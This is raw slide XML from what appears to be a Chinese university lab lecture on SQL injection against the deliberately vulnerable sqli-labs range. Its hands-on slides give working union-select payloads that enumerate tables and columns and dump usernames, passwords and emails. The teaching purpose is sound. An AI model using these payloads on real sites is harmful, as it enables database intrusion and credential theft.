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2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId14"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="704" r:id="rId4"/>
    <p:sldId id="705" r:id="rId5"/>
    <p:sldId id="707" r:id="rId6"/>
    <p:sldId id="706" r:id="rId7"/>
    <p:sldId id="709" r:id="rId8"/>
    <p:sldId id="711" r:id="rId9"/>
    <p:sldId id="710" r:id="rId10"/>
    <p:sldId id="712" r:id="rId11"/>
    <p:sldId id="713" r:id="rId12"/>
    <p:sldId id="71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>
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="3839">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="6766">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="817">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="641">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="51">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" orient="horz" pos="3954">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" orient="horz" pos="3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华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1A4157"/>
    <a:srgbClr val="394479"/>
    <a:srgbClr val="D9D9D9"/>
    <a:srgbClr val="BC3649"/>
    <a:srgbClr val="557788"/>
    <a:srgbClr val="8CA3AE"/>
    <a:srgbClr val="416C69"/>
    <a:srgbClr val="006C30"/>
    <a:srgbClr val="ADB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71108" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="103" d="100"/>
          <a:sy n="103" d="100"/>
        </p:scale>
        <p:origin x="48" y="428"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1911"/>
        <p:guide pos="3839"/>
        <p:guide pos="6766"/>
        <p:guide pos="817"/>
        <p:guide orient="horz" pos="641"/>
        <p:guide orient="horz" pos="51"/>
        <p:guide orient="horz" pos="3954"/>
        <p:guide orient="horz" pos="3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F2AF-B165-49ED-8D49-F91D3C9FFC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3238-B197-4DD0-8393-B222E6E855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0"/>
            <a:ext cx="612648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2800" cy="6858000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-MY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944679" y="0"/>
            <a:ext cx="7575809" cy="1028700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0"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6"/>
            <a:ext cx="12192000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17" y="1516136"/>
            <a:ext cx="3109566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3" y="2721935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3" y="4327286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6"/>
            <a:ext cx="11649807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17" y="1516136"/>
            <a:ext cx="3109566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3" y="2721935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3" y="4327286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9756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17" y="1516136"/>
            <a:ext cx="3109566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3" y="2721935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3" y="4327286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2401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17" y="1516136"/>
            <a:ext cx="3109566" cy="911046"/>
            <a:chOff x="4541217" y="1516136"/>
            <a:chExt cx="3109566" cy="911046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3" y="2721935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3" y="4327286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0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2" y="6206331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6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2"/>
            <a:ext cx="2438400" cy="752475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0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2" y="6206331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6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2"/>
            <a:ext cx="2438400" cy="7524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3456451"/>
            <a:ext cx="10850563" cy="8698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4406734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4722368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10442716" y="202243"/>
            <a:ext cx="69568" cy="3429000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="381000" cy="3429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6200000">
            <a:off x="1679716" y="202243"/>
            <a:ext cx="69568" cy="342900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6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5" y="1123950"/>
            <a:ext cx="1553273" cy="15532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91" y="1140104"/>
            <a:ext cx="2157323" cy="1553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6" y="1077943"/>
            <a:ext cx="1677597" cy="1677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2C0D-3978-4D00-BE11-3FF38497FCC0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69DF-D574-4037-B6A5-58CCD724C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2023/6/11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1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0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5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6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6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3" y="-19958"/>
            <a:ext cx="1484186" cy="10686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0" y="2248351"/>
            <a:ext cx="12192000" cy="894080"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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华光中圆_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>网络空间安全综合演练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华光中圆_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-SQL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华光中圆_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>注入漏洞利用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73098" y="4711552"/>
            <a:ext cx="10845800" cy="170912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助教：网安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211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许澍机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任课老师：鲁辉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2023.6.13</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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注入实战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查询字段名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id=-1' union select 1,2,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.columns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='emails'%23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id=-1' union select 1,2,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.columns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='users'%23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id=-1' union select 1,2,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.columns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='users' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>='security'%23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查询字段内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id=-1' union select 1,2,group_concat(id) from users%23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id=-1' union select 1,2,group_concat(id) from security.users%23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id=-1' union select 1,2,username from users limit 10,1%23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id=-1' union select 1,group_concat(username),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(password) from users%23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id=-1' union select 1,group_concat(id),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>group_concat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email_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>) from emails%23</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17676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注入分类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799708-101B-86AC-3E4F-C6AB6BDD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73938"/>
            <a:ext cx="6520585" cy="3007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933AD9-C7D3-F632-1DCF-FAE25564B64B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="4727036"/>
            <a:ext cx="10850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每一道题的注入点都不一样，先找注入点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>多刷题，多看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>wp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，积累不同类型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>、盲注脚本等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1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70335-955D-0224-054E-15F81F519D96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669923" y="1460969"/>
            <a:ext cx="108505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sng" dirty="0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zh-CN" altLang="en-US" sz="2800" b="0" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>注入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就是指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应用程序对用户输入数据的合法性没有判断，前端传入后端的参数是攻击者可控的，并且参数带入数据库查询，攻击者可以通过构造不同的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语句来实现对数据库的任意操作。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51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70335-955D-0224-054E-15F81F519D96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1259319"/>
            <a:ext cx="2114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库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(database)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3BA1CD-0EC0-0AE1-4BDA-A4C874CC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12"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1859270"/>
            <a:ext cx="2548289" cy="36513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A4AD2A0-55A5-E851-074F-2B50205D2843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6847113" y="1259319"/>
            <a:ext cx="1982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字段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(column)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32C77E-22FF-B776-6284-2567E1E48C72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3888839" y="1259319"/>
            <a:ext cx="2294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(table)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A4F62B-2162-2C97-61FF-208712ED2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" r="17656" b="357"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3881538" y="1859270"/>
            <a:ext cx="2098370" cy="3638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EBED43-20FB-DA90-84D3-75C80AF53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3" y="1859270"/>
            <a:ext cx="1498196" cy="11290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D5F2696-1DDD-E47B-24BA-D2D5D87B6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3" y="3429000"/>
            <a:ext cx="4338768" cy="13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1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MySQL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4B82-2A05-3011-3E16-375A53CE28D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1291395"/>
            <a:ext cx="107719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show databases;  //查询所有库名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>库名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>  //使用某个库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>show tables;  //查询该库的所有表名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>;  //查询该库的某个表的所有列名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>库名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt;.&lt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>;  //查询某个库的某个表的所有列名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>字段名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>;  //查询该库的某个表的某一列内容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条件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>limit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>m,n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>查询从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>行开始的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>行数据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[m, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>m+n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where &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>字段名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt; = “xxx”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nd和or</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>order by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>字段名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>n  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>返回结果按照某字段排序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>union  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>联合查询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、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>--&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>空格</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt;  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>注释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23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必要知识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MySQL5.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>以上版本中，存在一个名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的库，它存储了所有数据库名、表名、字段名，所以可以通过查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>来获取指定库的表名和字段名信息。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B5D67-2126-2E34-53F8-D7E55F2DA4FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669923" y="2351740"/>
            <a:ext cx="9097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常用参数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>记录了所有表名信息的表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.columns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记录了所有列名信息的表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>table_schema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数据库名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>table_name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表名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>column_name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字段名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>user()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>当前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的用户名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>database()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>当前网站使用的数据库名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>version()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>当前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的版本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38289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靶场环境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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>phpstudy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sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>修改 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>phpstudy_pro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>\WWW\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-labs-master\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-connections\db-creds.inc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F6511-0455-7B0E-3FDB-26E804A4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2" y="2786660"/>
            <a:ext cx="5730877" cy="16910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7AA59B-C8A3-819D-1EC0-592C56C93BF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669923" y="4604683"/>
            <a:ext cx="10850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php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>版本：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>5.5&lt;5.x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286420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注入实战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/Less-1/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>源码分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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F713AC-7859-AA1A-E981-E1FBC8D2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1912890"/>
            <a:ext cx="6609651" cy="9038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F0ED78-1B9A-2D81-28F7-633D07734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5" t="3763" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="669921" y="3495656"/>
            <a:ext cx="2678921" cy="3423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0CA4E6-E39B-05D1-D501-3EFBCF306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1" r="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="669921" y="2993277"/>
            <a:ext cx="3290699" cy="325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23CEAD-BE04-ABAB-3509-CA057D5FC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1" y="4014481"/>
            <a:ext cx="5689315" cy="8178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493A1B-2834-160E-AE8C-89C518ABE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1" y="5008879"/>
            <a:ext cx="3735824" cy="3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注入实战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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>注入语句分析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dirty="0"/>
              <a:t>$id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1'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="SELECT * FROM users WHERE id='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
